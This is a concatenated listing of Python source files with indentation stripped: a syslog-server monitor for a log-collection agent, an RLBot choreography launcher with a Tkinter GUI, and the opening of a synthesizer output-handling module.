"""Deletes unused log files that match a log_file_template"""
def __init__( self, check_interval_mins, delete_interval_hours, check_rotated_timestamps, max_log_rotations, log_path, log_file_template ):
self._check_interval = check_interval_mins * 60
self._delete_interval = delete_interval_hours * 60 * 60
self._check_rotated_timestamps = check_rotated_timestamps
self._max_log_rotations = max_log_rotations
self._log_glob = os.path.join( log_path, log_file_template.safe_substitute( CID='*', CNAME='*' ) )
self._last_check = time.time()
def _get_old_logs_for_glob( self, current_time, glob_pattern, existing_logs, check_rotated, max_rotations ):
result = []
for matching_file in glob.glob( glob_pattern ):
try:
added = False
mtime = os.path.getmtime(matching_file)
if current_time - mtime > self._delete_interval and matching_file not in existing_logs:
result.append( matching_file )
added = True
for i in range( max_rotations, 0, -1 ):
rotated_file = matching_file + ('.%d' % i)
try:
if not os.path.isfile( rotated_file ):
continue
if check_rotated:
mtime = os.path.getmtime(rotated_file)
if current_time - mtime > self._delete_interval:
result.append( rotated_file )
else:
if added:
result.append( rotated_file )
except OSError, e:
global_log.warn( "Unable to read modification time for file '%s', %s" % (rotated_file, str(e)),
limit_once_per_x_secs=300,
limit_key='mtime-%s'%rotated_file)
except OSError, e:
global_log.warn( "Unable to read modification time for file '%s', %s" % (matching_file, str(e)),
limit_once_per_x_secs=300,
limit_key='mtime-%s'%matching_file)
return result
def check_for_old_logs( self, existing_logs ):
old_logs = []
current_time = time.time()
if current_time - self._last_check > self._check_interval:
old_logs = self._get_old_logs_for_glob( current_time, self._log_glob, existing_logs, self._check_rotated_timestamps, self._max_log_rotations )
self._last_check = current_time
for filename in old_logs:
try:
os.remove( filename )
global_log.log(scalyr_logging.DEBUG_LEVEL_1, "Deleted old log file '%s'" % filename )
except OSError, e:
global_log.warn( "Error deleting old log file '%s', %s" % (filename, str(e)),
limit_once_per_x_secs=300,
limit_key='delete-%s'%filename)
class SyslogHandler(object):
"""Protocol neutral class for handling messages that come in from a syslog server
@param line_reporter A function to invoke whenever the server handles lines. The number of lines
must be supplied as the first argument.
"""
def __init__( self, logger, line_reporter, config, server_host, log_path, get_log_watcher, rotate_options ):
docker_logging = config.get('mode') == 'docker'
self.__docker_regex = None
self.__docker_regex_full = None
self.__docker_id_resolver = None
self.__docker_file_template = None
self.__docker_log_deleter = None
if rotate_options is None:
rotate_options = (2, 20*1024*1024)
default_rotation_count, default_max_bytes = rotate_options
rotation_count = config.get( 'max_log_rotations' )
if rotation_count is None:
rotation_count = default_rotation_count
max_log_size = config.get( 'max_log_size' )
if max_log_size is None:
max_log_size = default_max_bytes
if docker_logging:
self.__docker_regex_full = self.__get_regex(config, 'docker_regex_full')
self.__docker_regex = self.__get_regex(config, 'docker_regex')
self.__docker_file_template = Template(config.get('docker_logfile_template'))
self.__docker_log_deleter = LogDeleter( config.get( 'docker_check_for_unused_logs_mins' ),
config.get( 'docker_delete_unused_logs_hours' ),
config.get( 'docker_check_rotated_timestamps' ),
rotation_count,
log_path,
self.__docker_file_template )
if config.get('docker_use_daemon_to_resolve'):
from scalyr_agent.builtin_monitors.docker_monitor import ContainerIdResolver
self.__docker_id_resolver = ContainerIdResolver(config.get('docker_api_socket'),
config.get('docker_api_version'),
global_log,
cache_expiration_secs=config.get(
'docker_cid_cache_lifetime_secs'),
cache_clean_secs=config.get(
'docker_cid_clean_time_secs'))
self.__log_path = log_path
self.__server_host = server_host
self.__get_log_watcher = get_log_watcher
self.__logger = logger
self.__line_reporter = line_reporter
self.__docker_logging = docker_logging
self.__docker_loggers = {}
self.__container_names = {}
self.__expire_count = 0
self.__logger_lock = threading.Lock()
self.__docker_expire_log = config.get( 'docker_expire_log' )
self.__max_log_rotations = rotation_count
self.__max_log_size = max_log_size
self.__flush_delay = config.get('log_flush_delay')
def __get_regex(self, config, field_name):
value = config.get(field_name)
if len(value) > 0:
return re.compile(value)
else:
return None
def __create_log_config( self, cname, cid ):
full_path = os.path.join( self.__log_path, self.__docker_file_template.safe_substitute(
{'CID': cid, 'CNAME': cname}))
log_config = {
'parser': 'agentSyslogDocker',
'path': full_path
}
return log_config
def __extra_attributes( self, cname, cid ):
attributes = None
try:
attributes = JsonObject( {
"monitor": "agentSyslog",
"containerName": cname,
"containerId": cid
} )
if self.__server_host:
attributes['serverHost'] = self.__server_host
except Exception, e:
global_log.error( "Error setting docker logger attribute in SyslogMonitor" )
raise
return attributes
def __create_log_file( self, cname, cid, log_config ):
"""create our own rotating logger which will log raw messages out to disk.
"""
result = None
try:
result = AutoFlushingRotatingFile( filename = log_config['path'],
max_bytes = self.__max_log_size,
backup_count = self.__max_log_rotations,
flush_delay = self.__flush_delay)
except Exception, e:
global_log.error( "Unable to open SyslogMonitor log file: %s" % str( e ) )
result = None
return result
def __extract_container_name_and_id(self, data):
"""Attempts to extract the container id and container name from the log line received from Docker via
syslog.
First, attempts to extract container id using `__docker_regex` and look up the container name via Docker.
If that fails, attempts to extract the container id and container name using the `__docker_regex_full`.
@param data: The incoming line
@type data: str
@return: The container name, container id, and the rest of the line if extract was successful. Otherwise,
None, None, None.
@rtype: str, str, str
"""
# The reason flags contains some information about the code path used when a container id is not found.
# We emit this to the log to help us debug customer issues.
reason_flags = ''
if self.__docker_regex is not None and self.__docker_id_resolver is not None:
reason_flags += '1'
m = self.__docker_regex.match(data)
if m is not None:
reason_flags += '2'
#global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Matched cid-only syslog format')
cid = m.group(1)
cname = None
self.__logger_lock.acquire()
try:
if cid not in self.__container_names:
reason_flags += '3'
self.__container_names[cid] = self.__docker_id_resolver.lookup(cid)
cname = self.__container_names[cid]
finally:
self.__logger_lock.release()
if cid is not None and cname is not None:
#global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Resolved container name')
return cname, cid, data[m.end():]
if self.__docker_regex_full is not None:
reason_flags += '4'
m = self.__docker_regex_full.match(data)
if m is not None:
reason_flags += '5'
if m is not None and m.lastindex == 2:
#global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Matched cid/cname syslog format')
return m.group(1), m.group(2), data[m.end():]
regex_str = self.__get_pattern_str(self.__docker_regex)
regex_full_str = self.__get_pattern_str(self.__docker_regex_full)
global_log.warn('Could not determine container from following incoming data. Container logs may be '
'missing, performance could be impacted. Data(%s): "%s" Did not match either single '
'regex: "%s" or full regex: "%s"' % (reason_flags, data[:70], regex_str, regex_full_str),
limit_once_per_x_secs=300, limit_key='syslog_docker_cid_not_extracted')
#global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Could not extract cid/cname for "%s"', data)
return None, None, None
def __get_pattern_str(self, regex_value):
"""Helper method for getting the string version of a compiled regular expression. Also handles if the regex
is None.
"""
result = None
if regex_value is not None:
result = regex_value.pattern
return str(result)
def __handle_docker_logs( self, data ):
watcher = None
module = None
# log watcher for adding/removing logs from the agent
if self.__get_log_watcher:
watcher, module = self.__get_log_watcher()
(cname, cid, line_content) = self.__extract_container_name_and_id(data)
if cname is None:
return
current_time = time.time()
current_log_files = []
self.__logger_lock.acquire()
try:
logger = None
if cname is not None and cid is not None:
# check if we already have a logger for this container
# and if not, then create it
if cname not in self.__docker_loggers:
info = dict()
# get the config and set the attributes
info['log_config'] = self.__create_log_config( cname, cid )
info['cid'] = cid
attributes = self.__extra_attributes( cname, cid )
if attributes:
info['log_config']['attributes'] = attributes
# create the physical log files
info['logger'] = self.__create_log_file( cname, cid, info['log_config'] )
info['last_seen'] = current_time
# if we created the log file
if info['logger']:
# add it to the main scalyr log watcher
if watcher and module:
info['log_config'] = watcher.add_log_config( module, info['log_config'] )
# and keep a record for ourselves
self.__docker_loggers[cname] = info
else:
global_log.warn( "Unable to create logger for %s." % cname )
return
# at this point __docker_loggers will always contain
# a logger for this container name, so log the message
# and mark the time
logger = self.__docker_loggers[cname]
logger['last_seen'] = current_time
if self.__expire_count >= RUN_EXPIRE_COUNT:
self.__expire_count = 0
# find out which if any of the loggers in __docker_loggers have
# expired
expired = []
for key, info in self.__docker_loggers.iteritems():
if current_time - info['last_seen'] > self.__docker_expire_log:
expired.append( key )
# remove all the expired loggers
for key in expired:
info = self.__docker_loggers.pop( key, None )
if info:
info['logger'].close()
if watcher and module:
watcher.remove_log_path( module.module_name, info['log_config']['path'] )
self.__expire_count += 1
for key, info in self.__docker_loggers.iteritems():
current_log_files.append( info['log_config']['path'] )
finally:
self.__logger_lock.release()
if logger:
logger['logger'].write(line_content)
else:
global_log.warning('Syslog writing docker logs to syslog file instead of container log',
limit_once_per_x_secs=600, limit_key='syslog-docker-not-container-log')
self.__logger.info( data )
if self.__docker_log_deleter:
self.__docker_log_deleter.check_for_old_logs( current_log_files )
def handle( self, data ):
if self.__docker_logging:
self.__handle_docker_logs( data )
else:
self.__logger.info( data )
# We add plus one because the calling code strips off the trailing new lines.
self.__line_reporter(data.count('\n') + 1)
class RequestVerifier( object ):
"""Determines whether or not a request should be processed
based on the state of various config options
"""
def __init__( self, accept_remote, accept_ips, docker_logging ):
self.__accept_remote = accept_remote
self.__accept_ips = accept_ips
self.__docker_logging = docker_logging
def verify_request( self, client_address ):
result = True
address, port = client_address
if self.__docker_logging:
result = self.__accept_remote or address in self.__accept_ips
if not result:
global_log.log(scalyr_logging.DEBUG_LEVEL_4, "Rejecting request from %s" % str( client_address ) )
return result
class SyslogServer(object):
"""Abstraction for a syslog server, that creates either a UDP or a TCP server, and
configures a handler to process messages.
This removes the need for users of this class to care about the underlying protocol being used
@param line_reporter A function to invoke whenever the server handles lines. The number of lines
must be supplied as the first argument.
"""
def __init__( self, protocol, port, logger, config, line_reporter, accept_remote=False, server_host=None, log_path=None, get_log_watcher=None, rotate_options=None):
server = None
accept_ips = config.get( 'docker_accept_ips' )
if accept_ips == None:
accept_ips = []
gateway_ip = _get_default_gateway()
if gateway_ip:
accept_ips = [ gateway_ip ]
global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Accept ips are: %s" % str( accept_ips ) );
docker_logging = config.get( 'mode' ) == 'docker'
verifier = RequestVerifier( accept_remote, accept_ips, docker_logging )
try:
bind_address = self.__get_bind_address( docker_logging=docker_logging, accept_remote=accept_remote )
if protocol == 'tcp':
global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Starting TCP Server" )
server = SyslogTCPServer( port, config.get( 'tcp_buffer_size' ), bind_address=bind_address, verifier=verifier )
elif protocol == 'udp':
global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Starting UDP Server" )
server = SyslogUDPServer( port, bind_address=bind_address, verifier=verifier )
except socket_error, e:
if e.errno == errno.EACCES and port < 1024:
raise Exception( 'Access denied when trying to create a %s server on a low port (%d). '
'Please try again on a higher port, or as root.' % (protocol, port) )
else:
raise
#don't continue if the config had a protocol we don't recognize
if server is None:
raise Exception( 'Unknown value \'%s\' specified for SyslogServer \'protocol\'.' % protocol )
#create the syslog handler, and add to the list of servers
server.syslog_handler = SyslogHandler( logger, line_reporter, config, server_host, log_path, get_log_watcher, rotate_options )
server.syslog_transport_protocol = protocol
server.syslog_port = port
self.__server = server
self.__thread = None
def __get_bind_address( self, docker_logging=False, accept_remote=False ):
result = 'localhost'
if accept_remote:
result = ''
else:
# check if we are running inside a docker container
if docker_logging and os.path.isfile( '/.dockerenv' ):
# need to accept from remote ips
result = ''
return result
def __prepare_run_state( self, run_state ):
if run_state is not None:
server = self.__server
server.set_run_state( run_state )
#shutdown is only available from python 2.6 onwards
#need to think of what to do for 2.4, which will hang on shutdown when run as standalone
if hasattr( server, 'shutdown' ):
run_state.register_on_stop_callback( server.shutdown )
def start( self, run_state ):
self.__prepare_run_state( run_state )
self.__server.serve_forever()
self.__server.socket.close()
def start_threaded( self, run_state ):
self.__prepare_run_state( run_state )
self.__thread = StoppableThread( target=self.start, name="Syslog monitor thread for %s:%d" % (self.__server.syslog_transport_protocol, self.__server.syslog_port) )
self.__thread.start()
def stop( self, wait_on_join=True, join_timeout=5 ):
if self.__thread is not None:
self.__thread.stop( wait_on_join=wait_on_join, join_timeout=join_timeout )
class SyslogMonitor( ScalyrMonitor ):
"""
# Syslog Monitor
The Syslog monitor allows the Scalyr Agent to act as a syslog server, proxying logs from any application or device
that supports syslog. It can recieve log messages via the syslog TCP or syslog UDP protocols.
@class=bg-warning docInfoPanel: An *agent monitor plugin* is a component of the Scalyr Agent. To use a plugin,
simply add it to the ``monitors`` section of the Scalyr Agent configuration file (``/etc/scalyr/agent.json``).
For more information, see [Agent Plugins](/help/scalyr-agent#plugins).
## Sample Configuration
This sample will configure the agent to accept syslog messages on TCP port 601 and UDP port 514, from localhost
only:
monitors: [
{
module: "scalyr_agent.builtin_monitors.syslog_monitor",
protocols: "tcp:601, udp:514",
accept_remote_connections: false
}
]
You can specify any number of protocol/port combinations. Note that on Linux, to use port numbers 1024 or lower,
the agent must be running as root.
You may wish to accept syslog connections from other devices on the network, such as a firewall or router which
exports logs via syslog. Set ``accept_remote_connections`` to true to allow this.
Additional options are documented in the Configuration Reference section, below.
## Log files and parsers
By default, all syslog messages are written to a single log file, named ``agentSyslog.log``. You can use the
``message_log`` option to specify a different file name (see Configuration Reference).
If you'd like to send messages from different devices to different log files, you can include multiple syslog_monitor
stanzas in your configuration file. Specify a different ``message_log`` for each monitor, and have each listen on a
different port number. Then configure each device to send to the appropriate port.
syslog_monitor logs use a parser named ``agentSyslog``. To set up parsing for your syslog messages, go to the
[Parser Setup Page](/parsers?parser=agentSyslog) and click {{menuRef:Leave it to Us}} or
{{menuRef:Build Parser By Hand}}. If you are using multiple syslog_monitor stanzas, you can specify a different
parser for each one, using the ``parser`` option.
## Sending messages via syslog
To send messages to the Scalyr Agent using the syslog protocol, you must configure your application or network
device. The documentation for your application or device should include instructions. We'll be happy to help out;
please drop us a line at [support@scalyr.com](mailto:support@scalyr.com).
### Rsyslogd
To send messages from another Linux host, you may wish to use the popular ``rsyslogd`` utility. rsyslogd has a
powerful configuration language, and can be used to forward all logs or only a selected set of logs.
Here is a simple example. Suppose you have configured Scalyr's Syslog Monitor to listen on TCP port 601, and you
wish to use rsyslogd on the local host to upload system log messages of type ``authpriv``. You would add the following
lines to your rsyslogd configuration, which is typically in ``/etc/rsyslogd.conf``:
# Send all authpriv messasges to Scalyr.
authpriv.* @@localhost:601
Make sure that this line comes before any other filters that could match the authpriv messages. The ``@@`` prefix
specifies TCP.
## Viewing Data
Messages uploaded by the Syslog Monitor will appear as an independent log file on the host where the agent is
running. You can find this log file in the [Overview](/logStart) page. By default, the file is named "agentSyslog.log".
"""
def _initialize( self ):
#the main server
self.__server = None
#any extra servers if we are listening for multiple protocols
self.__extra_servers = []
#build list of protocols and ports from the protocol option
self.__server_list = self.__build_server_list( self._config.get( 'protocols' ) )
#our disk logger and handler
self.__disk_logger = None
self.__log_handler = None
#whether or not to accept only connections created on this localhost.
self.__accept_remote_connections = self._config.get( 'accept_remote_connections' )
self.__server_host = None
self.__log_path = ''
if self._global_config:
self.__log_path = self._global_config.agent_log_path
if self._global_config.server_attributes:
if 'serverHost' in self._global_config.server_attributes:
self.__server_host = self._global_config.server_attributes['serverHost']
self.__log_watcher = None
self.__module = None
#configure the logger and path
self.__message_log = self._config.get( 'message_log' )
self.log_config = {
'parser': self._config.get( 'parser' ),
'path': self.__message_log,
}
self.__flush_delay = self._config.get('log_flush_delay')
try:
attributes = JsonObject( { "monitor": "agentSyslog" } )
self.log_config['attributes'] = attributes
except Exception, e:
global_log.error( "Error setting monitor attribute in SyslogMonitor" )
default_rotation_count, default_max_bytes = self._get_log_rotation_configuration()
self.__max_log_size = self._config.get( 'max_log_size' )
if self.__max_log_size is None:
self.__max_log_size = default_max_bytes
self.__max_log_rotations = self._config.get( 'max_log_rotations' )
if self.__max_log_rotations is None:
self.__max_log_rotations = default_rotation_count
def __build_server_list( self, protocol_string ):
"""Builds a list containing (protocol, port) tuples, based on a comma separated list
of protocols and optional ports e.g. protocol[:port], protocol[:port]
"""
#split out each protocol[:port]
protocol_list = [p.strip().lower() for p in protocol_string.split(',')]
if len( protocol_list ) == 0:
raise Exception('Invalid config state for Syslog Monitor. '
'No protocols specified')
default_ports = { 'tcp': 601,
'udp': 514,
}
server_list = []
#regular expression matching protocol:port
port_re = re.compile( '^(tcp|udp):(\d+)$' )
for p in protocol_list:
#protocol defaults to the full p for when match fails
protocol = p
port = 0
m = port_re.match( p )
if m:
protocol = m.group(1)
port = int( m.group(2) )
if protocol in default_ports:
#get the default port for this protocol if none was specified
if port == 0:
port = default_ports[protocol]
else:
raise Exception( 'Unknown value \'%s\' specified for SyslogServer \'protocol\'.' % protocol )
#only allow ports between 1 and 65535
if port < 1 or port > 65535:
raise Exception( 'Port values must be in the range 1-65535. Current value: %d.' % port )
server_list.append( (protocol, port) )
#return a list with duplicates removed
return list( set( server_list ) )
def open_metric_log( self ):
"""Override open_metric_log to prevent a metric log from being created for the Syslog Monitor
and instead create our own logger which will log raw messages out to disk.
"""
name = __name__ + '-' + self.__message_log + '.syslog'
self.__disk_logger = logging.getLogger( name )
#assume successful for when the logger handler has already been created
success = True
#only configure once -- assumes all configuration happens on the same thread
if len( self.__disk_logger.handlers ) == 0:
#logger handler hasn't been created yet, so assume unsuccssful
success = False
try:
self.__log_handler = AutoFlushingRotatingFileHandler( filename = self.log_config['path'],
maxBytes = self.__max_log_size,
backupCount = self.__max_log_rotations,
flushDelay = self.__flush_delay)
formatter = logging.Formatter()
self.__log_handler.setFormatter( formatter )
self.__disk_logger.addHandler( self.__log_handler )
self.__disk_logger.setLevel( logging.INFO )
self.__disk_logger.propagate = False
success = True
except Exception, e:
global_log.error( "Unable to open SyslogMonitor log file: %s" % str( e ) )
return success
def close_metric_log( self ):
if self.__log_handler:
self.__disk_logger.removeHandler( self.__log_handler )
self.__log_handler.close()
def set_log_watcher( self, log_watcher ):
self.__log_watcher = log_watcher
def __get_log_watcher( self ):
return (self.__log_watcher, self)
def run( self ):
def line_reporter(num_lines):
self.increment_counter(reported_lines=num_lines)
rotate_options = self._get_log_rotation_configuration()
try:
if self.__disk_logger is None:
raise Exception( "No disk logger available for Syslog Monitor" )
#create the main server from the first item in the server list
protocol = self.__server_list[0]
self.__server = SyslogServer( protocol[0], protocol[1], self.__disk_logger, self._config,
line_reporter, accept_remote=self.__accept_remote_connections,
server_host=self.__server_host, log_path=self.__log_path,
get_log_watcher=self.__get_log_watcher, rotate_options=rotate_options )
#iterate over the remaining items creating servers for each protocol
for p in self.__server_list[1:]:
server = SyslogServer( p[0], p[1], self.__disk_logger, self._config,
line_reporter, accept_remote=self.__accept_remote_connections,
server_host=self.__server_host, log_path=self.__log_path,
get_log_watcher=self.__get_log_watcher, rotate_options=rotate_options )
self.__extra_servers.append( server )
#start any extra servers in their own threads
for server in self.__extra_servers:
server.start_threaded( self._run_state )
#start the main server
self.__server.start( self._run_state )
except Exception, e:
global_log.exception('Monitor died due to exception:', error_code='failedMonitor')
raise
def stop(self, wait_on_join=True, join_timeout=5):
#stop the main server
ScalyrMonitor.stop( self, wait_on_join=wait_on_join, join_timeout=join_timeout )
#stop any extra servers
for server in self.__extra_servers:
server.stop( wait_on_join, join_timeout )
|
__main__.py | """RLBotChoreography"""
import copy
import os
import sys
import inspect
import time
from importlib import reload, import_module
from queue import Queue
from threading import Thread
from os.path import dirname, basename, isfile, join
import glob
from rlbot.matchconfig.conversions import parse_match_config
from rlbot.matchconfig.match_config import PlayerConfig
from rlbot.parsing.agent_config_parser import load_bot_appearance, create_looks_configurations
from rlbot.parsing.bot_config_bundle import get_bot_config_bundle
from rlbot.parsing.directory_scanner import scan_directory_for_bot_configs
from rlbot.parsing.rlbot_config_parser import create_bot_config_layout
from rlbot.setup_manager import SetupManager
from rlbot.utils.structures.start_match_structures import MAX_PLAYERS
import hivemind
from queue_commands import QCommand
from choreography.choreography import Choreography
# TODO:
# - Prettify GUI
class RLBotChoreography:
def __init__(self):
# Runs GUI and Hivemind on two different threads.
q = Queue()
thread1 = Thread(target=self.run_gui, args=(q,))
thread1.start()
thread2 = Thread(target=self.run_RLBotChoreography, args=(q,))
thread2.start()
q.join()
def setup_match(self):
# Set up RLBot.cfg
framework_config = create_bot_config_layout()
config_location = os.path.join(os.path.dirname(__file__), 'rlbot.cfg')
framework_config.parse_file(config_location, max_index=MAX_PLAYERS)
match_config = parse_match_config(framework_config, config_location, {}, {})
match_config.game_map = self.choreo_obj.map_name
# The three blocks of code below are basically identical.
# TODO Make them into a function?
# Gets appearance list from choreo.
appearances = self.choreo_obj.get_appearances(self.min_bots)
# Checks that it is the correct length.
if len(appearances) != self.min_bots:
print('[RLBotChoreography]: Number of appearances does not match number of bots.')
print('[RLBotChoreography]: Using default appearances.')
appearances = ['default.cfg'] * self.min_bots
# Gets teams list from choreo.
teams = self.choreo_obj.get_teams(self.min_bots)
# Checks that it is the correct length.
if len(teams) != self.min_bots:
print('[RLBotChoreography]: Number of teams does not match number of bots.')
print('[RLBotChoreography]: Putting all on blue.')
teams = [0] * self.min_bots
# Gets names list from choreo.
names = self.choreo_obj.get_names(self.min_bots)
# Checks that it is the correct length.
if len(names) != self.min_bots:
print('[RLBotChoreography]: Number of names does not match number of bots.')
print('[RLBotChoreography]: Using bot indices as names.')
names = range(self.min_bots)
# Loads appearances.
looks_configs = {
idx: create_looks_configurations().parse_file(
os.path.abspath('./ChoreographyHive/appearances/' + file_name))
for idx, file_name in enumerate(appearances)
}
# rlbot.cfg specifies only one bot,
# so we have to copy each and assign correct appearance.
player_config = match_config.player_configs[0]
match_config.player_configs.clear()
for i in range(self.min_bots):
copied = PlayerConfig()
copied.name = names[i]
copied.team = teams[i]
copied.bot = player_config.bot
copied.rlbot_controlled = player_config.rlbot_controlled
copied.config_path = player_config.config_path
copied.loadout_config = load_bot_appearance(looks_configs[i], copied.team)
match_config.player_configs.append(copied)
manager = SetupManager()
manager.load_match_config(match_config, {})
manager.connect_to_game()
manager.start_match()
def run_RLBotChoreography(self, queue):
"""
If Hivemind breaks out of game_loop it is reloaded and recreated.
"""
# Waits until a START command is received.
while queue.get() != QCommand.START:
continue
self.setup_match()
while True:
# Reloads hivemind for new changes to take place.
reload(hivemind)
my_hivemind = hivemind.Hivemind(queue, self.choreo_obj)
try:
my_hivemind.start() # Loop only quits on STOP command.
except Exception as e:
print(f'[ERROR]: {e}')
# Checks what to do after Hivemind died.
command = queue.get()
if command == QCommand.ALL:
self.setup_match()
elif command == QCommand.EXIT:
break
exit() # Clean exit.
def run_gui(self, queue):
"""
Runs the simple gui.
"""
def reload_choreographies():
"""
Finds and reloads all choreo modules and puts the found choreographies inside a dictionary.
"""
# Automatically finds all choreo modules.
modules = glob.glob(join(dirname(__file__), "choreography/choreos/*.py"))
choreo_modules = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]
choreographies = {}
for choreo in choreo_modules:
module = f'choreography.choreos.{choreo}'
# Try reloading the module.
try:
reload(sys.modules[module])
classes = inspect.getmembers(sys.modules[module], inspect.isclass)
# If not loaded yet, import it.
except Exception as e:
print(e)
print(f'Importing {module}')
import_module(module)
classes = inspect.getmembers(sys.modules[module], inspect.isclass)
# Find all the choreography classes inside.
finally:
for name, obj in classes:
# Checks whether the class subclasses Choreography.
if issubclass(obj, Choreography) and obj is not Choreography:
# FIXME Watch out for name conflicts!
choreographies[name] = obj
return choreographies
def start():
num_bots_changed()
print("[RLBotChoreography]: Starting up!")
queue.put(QCommand.START)
# Removes the button so we cannot start again.
button_start.destroy()
# Hive reset button.
button_reload_hive = tk.Button(frame, text="↻ Hivemind", command=reload_hive)
button_reload_hive.pack()
# All reset button.
button_reload_all = tk.Button(frame, text="↻ All", command=reload_all)
button_reload_all.pack()
def num_bots_changed():
"""
Looks at the choreography's requested number of bots and uses that. Otherwise will use the entered number.
"""
try:
num_bots = self.choreo_obj.get_num_bots()
except NotImplementedError:
num_bots = int(entry_num_bots.get())
finally:
self.min_bots = min(int(num_bots), MAX_PLAYERS)
entry_num_bots.delete(0, last=tk.END)
entry_num_bots.insert(0, self.min_bots)
def choreo_selected(var):
"""
Updates the selected choreography.
"""
self.choreographies = reload_choreographies()
self.choreo_obj = self.choreographies[var]
num_bots_changed()
def reload_hive():
num_bots_changed()
print("[RLBotChoreography]: Stopping Hivemind.")
queue.put(QCommand.STOP)
choreo_selected(menuvar.get())
print("[RLBotChoreography]: Reloading Hivemind.")
queue.put(QCommand.HIVE)
def reload_all():
num_bots_changed()
print("[RLBotChoreography]: Stopping Hivemind.")
queue.put(QCommand.STOP)
choreo_selected(menuvar.get())
print("[RLBotChoreography]: Reloading all.")
queue.put(QCommand.ALL)
# TODO Make GUI look better.
import tkinter as tk
root = tk.Tk()
frame = tk.Frame(root)
frame.pack()
# Start button.
button_start = tk.Button(frame, text="Start", command=start)
button_start.pack()
# Dropdown menu.
self.choreographies = reload_choreographies()
menuvar = tk.StringVar(root)
menuvar.set('ConnectedChoreo') # Set the default option
dropMenu = tk.OptionMenu(frame, menuvar, *self.choreographies, command=choreo_selected)
dropMenu.pack()
# Label for the entry box.
label_num_bots = tk.Label(frame, text="Number of bots")
label_num_bots.pack()
# Number of bots entry box.
entry_num_bots = tk.Entry(frame)
entry_num_bots.insert(0, 10) # 10 is default.
entry_num_bots.pack()
# This is here just to make sure everything is set up by default.
choreo_selected(menuvar.get())
root.mainloop()
# Clean exit.
print('[RLBotChoreography]: Shutting down.')
queue.put(QCommand.STOP)
queue.put(QCommand.EXIT)
exit()
if __name__ == '__main__':
# Starts the show :)
RLBotChoreography()
|
base.py | """
PySynth Output Classes
We contain the PySynth OutputHandler,
and OutputControl.
Both classes handle and manage output from synth chains,
and send them to output modules attached to the Control class.
The Output class is the engine of this process,
pulling audio info and passing it along.
The OutputControl class manages the synth chains,
adding and removing them as necessary.
The design of the output class is heavily structured for sequencer use,
but you could script synth output using certain features located in OutputControl.
"""
from chaslib.misctools import get_logger
import threading
from concurrent.futures import ThreadPoolExecutor
import traceback
from chaslib.sound.utils import BaseModule, AudioMixer, get_time
from chaslib.sound.out import BaseOutput
class OutputControl(BaseModule):
"""
Output Control - Controls adding and removing synths from the OutputHandler.
We offer an easy to use interface for adding synths to the OutputHandler.
We act as any other synth module,
but when we are started, we add ourselves to the OutputHandler.
This starts the other modules attached to us, and audio information is consumed by the OutputHandler.
Because of this, we should be the LAST module in a synth chain.
If not, then some information could be lost,
and errors could occur when outputting information.
We offer the ability to add ourselves to the OutputHandler until we are stopped
(Great for sequencer use).
We also offer ways to add ourselves for a certain period of time,
or a certain number of samples.
Point is, if you iterate over us,
or call our start method,
then we will add ourselves to the OutputHandler until we are stopped.
You shouldn't create this module directly.
Instead, you should receive your very own OutputControl module
when you bind a synth to the OutputHandler.
"""
OUT = [] # Reference to OutputHandler
def __init__(self):
super(OutputControl, self).__init__()
self.time_remove = 0 # Time to remove ourselves. If 0, then we don't keep track
self.item_written = 0 # Number of items to write. If 0, then we don't keep track
self.wait = threading.Event()
self.wait.set()
def start(self):
"""
We simply prepare the object for iteration.
'__iter__()' does all the dirty work!
"""
# Clear our event:
self.wait.clear()
return iter(self)
def stop(self):
"""
Remove ourselves from the OutputHandler.
"""
# Remove ourselves from the OutputHandler:
self.OUT[0]._remove_synth(self)
self.time_remove = 0
self.item_written = 0
# Stop the chain:
self.input.stop_modules()
# Setting our event:
self.wait.clear()
def join(self):
"""
Waits until the SynthChain has stopped.
We use a threading Event object to handle te blocking.
"""
# Wait on the threading even:
self.wait.wait()
def get_next(self):
"""
We simply return values from the synth chain attached to us.
We also do some checks to determine if we should stop.
If we do stop, we will call our 'stop()' method,
which will remove us from the OutputHandler.
"""
if not self.info.running:
# The chain has stopped, lets exit:
self.stop()
return 0
if self.time_remove != 0 and self.time_remove > get_time():
# >Time< to remove ourselves! Our >Time< is up!
self.stop()
return 0
if self.item_written != 0 and self.item_written > self.index:
# We have written everything we can, lets remove:
self.stop()
return 0
# Otherwise, lets just return!
return self.get_input()
def write_time(self, time):
"""
Registers ourselves with the OutputHandler until we reach time.
:param time: Time to stop sending info to Output
:type time: int
"""
# Set the time limit:
self.time_remove = time
# Start ourselves:
self.start()
def write_num(self, num):
"""
Registers ourselves to the OutputHandler for a number of iterations.
:param num: Number of values to write
:type num: int
"""
# Set the max write limit:
self.item_written = num
# Start ourselves:
self.start()
def __iter__(self):
"""
We do the same as BaseModule,
except we add ourselves to the OutputHandler,
and we don't call 'start()'!
"""
# Reset the index value:
self.index = 0
# Prepare the sub-modules:
self.input.start_modules()
# Set our started value:
self.started = True
# Add ourselves to the OutputHandler:
self.OUT[0]._add_synth(self)
# Return ourselves:
return self
class OutputHandler:
"""
OutputHandler - Handles and coordinates sending audio data to certain locations
We handle the addition and subtraction of synths,
allowing them to be added and removed on the fly.
This is useful for systems such as the sequencer.
We also allow for outputting info to multiple sources,
so one could configure the output to send data to speakers
and a wave file at the same time.
When a synth is added, an 'OutputControl' is returned.
This class allows for the control of the synth added,
and allows for the developer to add the synth for a certain amount of time.
It also integrates will with the sequencer.
We are a 'reactive' output system,
meaning we only sample the synths when the modules request us too.
This allows for a balance of speed and accuracy,
so we don't sample more frames then we should.
This also means that we will only sample as quickly as our slowest module.
Most of the time this is ideal,
but if not then you should take care to only load modules you need!
"""
def __init__(self, rate=44100):
self._output = [] # Output modules to send information
self._work = ThreadPoolExecutor() # Thread pool executor to put our output modules in
self._input = AudioMixer() # Audio Collection to mix sound
self.rate = rate # Rate to output audio
self.futures = []
self.thread = []
self.producer_process = None # Producer thread
self.run = False # Value determining if we are running
self._pause = threading.Event() # Event object determining if we are paused
self.log = get_logger("AUDIO")
self._pause.set()
def add_output(self, out):
"""
Adds an output module to this class.
We ensure it inherits BaseModule, and then we add it.
If we are currently running,
then we start it and add it to the thread pool executor.
If we are not started, then we will wait to add the modules until we have been.
:param out: Output modules to add
:type out: BaseOutput
"""
